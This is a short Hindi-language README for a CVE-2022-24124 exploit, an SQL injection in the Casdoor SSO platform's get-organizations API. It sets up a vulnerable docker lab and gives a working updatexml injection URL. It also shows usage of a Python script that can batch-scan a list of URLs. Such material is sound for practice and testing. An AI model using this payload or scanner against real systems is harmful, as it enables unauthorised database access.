
CVE-2022-24124 एक्सप्लॉइट
Casdoor OAuth 2.0/OIDC पर आधारित एक केंद्रीकृत सिंगल साइन-ऑन (SSO) प्रमाणीकरण प्लेटफ़ॉर्म है
CVE नंबर: CVE-2022-24124
CNPD नंबर: CNPD-202201-7304
खतरा स्तर: उच्च ( 7.5 HIGH )
POC/EXP: सार्वजनिक रूप से उपलब्ध
Casdoor < Casdoor 1.13.1 // संस्करण 1.13.1 से पहले के सभी संस्करण प्रभावित हैं
यह भेद्यता SQL इंजेक्शन प्रकार की है। क्वेरी API में field और value पैरामीटर से संबंधित SQL इंजेक्शन भेद्यता मौजूद है, जैसा कि api/get-organizations में दिखाया गया है।
भेद्यता इमेज खींचें
docker pull vulfocus/casdoor:1.13.0

भेद्यता वातावरण प्रारंभ करें
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

भेद्यता वातावरण का पृष्ठ खोलें

POC का उपयोग करके payload तैयार करें
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

अभ्यास के लिए एक Python संस्करण लिखा गया, और एक बैच डिटेक्शन सुविधा भी जोड़ी गई।